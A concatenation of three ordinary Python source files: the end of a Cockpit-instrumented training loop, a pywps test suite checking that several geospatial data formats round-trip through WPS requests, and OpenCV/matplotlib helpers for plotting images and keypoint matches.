model = extend(problem.model)
loss_fn = extend(problem.loss_function)
individual_loss_fn = extend(problem.individual_loss_function)
# Create Optimizer
optimizer = problem.optimizer
# Initialize Cockpit
self.cockpit = Cockpit(model.parameters(), **cockpit_kwargs)
# print(cockpit_exts)
# Main training loop
global_step = 0
for inputs, labels in iter(data):
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
# forward pass
outputs = model(inputs)
loss = loss_fn(outputs, labels)
losses = individual_loss_fn(outputs, labels)
# code inside this block does not alter random number generation
with restore_rng_state():
# backward pass
with self.cockpit(
global_step,
*backpack_exts,
info={
"batch_size": inputs.shape[0],
"individual_losses": losses,
"loss": loss,
"optimizer": optimizer,
},
):
loss.backward(create_graph=self.cockpit.create_graph(global_step))
self.check_in_context()
self.check_after_context()
# optimizer step
optimizer.step()
global_step += 1
if global_step >= iterations:
break
def check_in_context(self):
"""Check that will be executed within the cockpit context."""
pass
def check_after_context(self):
"""Check that will be executed directly after the cockpit context."""
pass
|
tests/test_complexdata_io.py
|
geotom/pywps
| 117 |
104561
|
"""Test embedding different file formats and different encodings within the <Data> tag."""
import unittest
import os
from pywps import get_ElementMakerForVersion
from pywps.app.basic import get_xpath_ns
from pywps import Service, Process, ComplexInput, ComplexOutput, FORMATS
from pywps.tests import client_for, assert_response_success
from owslib.wps import WPSExecution, ComplexDataInput
from pywps import xml_util as etree
VERSION = "1.0.0"
WPS, OWS = get_ElementMakerForVersion(VERSION)
xpath_ns = get_xpath_ns(VERSION)
def get_resource(path):
return os.path.join(os.path.abspath(os.path.dirname(__file__)), 'data', path)
test_fmts = {'json': (get_resource('json/point.geojson'), FORMATS.JSON),
'geojson': (get_resource('json/point.geojson'), FORMATS.GEOJSON),
'netcdf': (get_resource('netcdf/time.nc'), FORMATS.NETCDF),
'geotiff': (get_resource('geotiff/dem.tiff'), FORMATS.GEOTIFF),
'gml': (get_resource('gml/point.gml'), FORMATS.GML),
'shp': (get_resource('shp/point.shp.zip'), FORMATS.SHP),
'txt': (get_resource('text/unsafe.txt'), FORMATS.TEXT),
}
def create_fmt_process(name, fn, fmt):
"""Create a dummy process comparing the input file on disk and the data that was passed in the request."""
def handler(request, response):
# Load output from file and convert to data
response.outputs['complex'].file = fn
o = response.outputs['complex'].data
# Get input data from the request
i = request.inputs['complex'][0].data
assert i == o
return response
return Process(handler=handler,
identifier='test-fmt',
title='Complex fmt test process',
inputs=[ComplexInput('complex', 'Complex input',
supported_formats=(fmt, ))],
outputs=[ComplexOutput('complex', 'Complex output',
supported_formats=(fmt, ))])
def get_data(fn, encoding=None):
"""Read the data from file and encode."""
import base64
mode = 'rb' if encoding == 'base64' else 'r'
with open(fn, mode) as fp:
data = fp.read()
if encoding == 'base64':
data = base64.b64encode(data)
if isinstance(data, bytes):
return data.decode('utf-8')
else:
return data
class RawInput(unittest.TestCase):
def make_request(self, name, fn, fmt):
"""Create XML request embedding encoded data."""
data = get_data(fn, fmt.encoding)
doc = WPS.Execute(
OWS.Identifier('test-fmt'),
WPS.DataInputs(
WPS.Input(
OWS.Identifier('complex'),
WPS.Data(
WPS.ComplexData(data, mimeType=fmt.mime_type, encoding=fmt.encoding)))),
version='1.0.0')
return doc
def compare_io(self, name, fn, fmt):
"""Start the dummy process, post the request and check the response matches the input data."""
# Note that `WPSRequest` calls `get_inputs_from_xml` which converts base64 input to bytes
# See `_get_rawvalue_value`
client = client_for(Service(processes=[create_fmt_process(name, fn, fmt)]))
data = get_data(fn, fmt.encoding)
wps = WPSExecution()
doc = wps.buildRequest('test-fmt',
inputs=[('complex', ComplexDataInput(data, mimeType=fmt.mime_type,
encoding=fmt.encoding))],
mode='sync')
resp = client.post_xml(doc=doc)
assert_response_success(resp)
wps.parseResponse(resp.xml)
out = wps.processOutputs[0].data[0]
if 'gml' in fmt.mime_type:
xml_orig = etree.tostring(etree.fromstring(data.encode('utf-8'))).decode('utf-8')
xml_out = etree.tostring(etree.fromstring(out.decode('utf-8'))).decode('utf-8')
# Not equal because the output includes additional namespaces compared to the origin.
# self.assertEqual(xml_out, xml_orig)
else:
self.assertEqual(out.strip(), data.strip())
def test_json(self):
key = 'json'
self.compare_io(key, *test_fmts[key])
def test_geojson(self):
key = 'geojson'
self.compare_io(key, *test_fmts[key])
def test_geotiff(self):
key = 'geotiff'
self.compare_io(key, *test_fmts[key])
def test_netcdf(self):
key = 'netcdf'
self.compare_io(key, *test_fmts[key])
def test_gml(self):
key = 'gml'
self.compare_io(key, *test_fmts[key])
def test_shp(self):
key = 'shp'
self.compare_io(key, *test_fmts[key])
def test_txt(self):
key = 'txt'
self.compare_io(key, *test_fmts[key])
|
notebooks/utils.py
|
xuzhuang1996/hierarchical_loc
| 143 |
104575
|
import matplotlib.pyplot as plt
import cv2
import numpy as np
def plot_imgs(imgs, titles=None, cmap='brg', ylabel='', normalize=True, ax=None,
r=(0, 1), dpi=100):
n = len(imgs)
if not isinstance(cmap, list):
cmap = [cmap]*n
if ax is None:
_, ax = plt.subplots(1, n, figsize=(6*n, 6), dpi=dpi)
if n == 1:
ax = [ax]
else:
if not isinstance(ax, list):
ax = [ax]
assert len(ax) == len(imgs)
for i in range(n):
if len(imgs[i].shape) == 3:
if imgs[i].shape[-1] == 3:
imgs[i] = imgs[i][..., ::-1] # BGR to RGB
elif imgs[i].shape[-1] == 1:
imgs[i] = imgs[i][..., 0]
if len(imgs[i].shape) == 2 and cmap[i] == 'brg':
cmap[i] = 'gray'
ax[i].imshow(imgs[i], cmap=plt.get_cmap(cmap[i]),
vmin=None if normalize else r[0],
vmax=None if normalize else r[1])
if titles:
ax[i].set_title(titles[i])
ax[i].get_yaxis().set_ticks([])
ax[i].get_xaxis().set_ticks([])
for spine in ax[i].spines.values(): # remove frame
spine.set_visible(False)
ax[0].set_ylabel(ylabel)
plt.tight_layout()
def draw_datches(img1, kp1, img2, kp2, matches, color=None, kp_radius=5,
thickness=2, margin=20):
# Create frame
if len(img1.shape) == 3:
new_shape = (max(img1.shape[0], img2.shape[0]),
img1.shape[1]+img2.shape[1]+margin,
img1.shape[2])
elif len(img1.shape) == 2:
new_shape = (max(img1.shape[0],
img2.shape[0]),
img1.shape[1]+img2.shape[1]+margin)
new_img = np.ones(new_shape, type(img1.flat[0]))*255
# Place original images
new_img[0:img1.shape[0], 0:img1.shape[1]] = img1
new_img[0:img2.shape[0],
img1.shape[1]+margin:img1.shape[1]+img2.shape[1]+margin] = img2
# Draw lines between matches
if color:
c = color
for m in matches:
# Generate random color for RGB/BGR and grayscale images as needed.
if not color:
if len(img1.shape) == 3:
c = np.random.randint(0, 256, 3)
else:
c = np.random.randint(0, 256)
c = (int(c[0]), int(c[1]), int(c[2]))
end1 = tuple(np.round(kp1[m.trainIdx].pt).astype(int))
end2 = tuple(np.round(kp2[m.queryIdx].pt).astype(int)
+ np.array([img1.shape[1]+margin, 0]))
cv2.line(new_img, end1, end2, c, thickness, lineType=cv2.LINE_AA)
cv2.circle(new_img, end1, kp_radius, c, thickness, lineType=cv2.LINE_AA)
cv2.circle(new_img, end2, kp_radius, c, thickness, lineType=cv2.LINE_AA)
return new_img
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.